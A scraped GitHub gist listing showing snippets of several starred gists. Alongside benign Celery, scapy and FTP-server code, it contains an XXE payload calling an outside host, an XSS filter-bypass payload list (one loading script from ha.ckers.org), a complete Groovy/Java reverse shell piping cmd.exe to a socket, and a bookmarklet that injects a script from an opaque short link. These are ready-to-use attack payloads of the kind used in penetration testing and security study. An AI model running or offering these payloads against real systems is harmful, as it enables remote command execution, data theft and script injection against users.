Skip to content

Instantly share code, notes, and snippets.

View muttiopenbts's full-sized avatar

Mutti muttiopenbts

16 followers · 12 following
View GitHub Profile
@amatellanes
amatellanes / celery.sh
Last active April 19, 2024 11:31
Celery handy commands
/* Useful celery config.
app = Celery('tasks',
broker='redis://localhost:6379',
backend='redis://localhost:6379')
app.conf.update(
CELERY_TASK_RESULT_EXPIRES=3600,
CELERY_QUEUES=(
Queue('default', routing_key='tasks.#'),
@staaldraad
staaldraad / XXE_payloads
Last active May 24, 2024 11:08
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@eXenon
eXenon / scapy_bridge.py
Last active May 12, 2024 03:00
Use scapy as a modifying proxy
#!/usr/bin/python2
"""
Use scapy to modify packets going through your machine.
Based on nfqueue to block packets in the kernel and pass them to scapy for validation
"""
import nfqueue
from scapy.all import *
import os
@haridsv
haridsv / bookmarklet
Last active June 14, 2022 05:14
Paste Enabler, remove attributes from form text fields that restrict copy and paste operations. Tested to be working on many financial websites, though on some it causes duplication (workaround: undo).
javascript:s=document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='https://goo.gl/OrQlxL';void(0);
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 21, 2024 10:27
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@muttiopenbts
muttiopenbts / ftpserver.py
Last active January 5, 2017 18:29 — forked from scturtle/ftpserver.py
simple ftp server by python
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
import sys
#import traceback
allow_delete = False
local_ip = sys.argv[1]
local_port = 21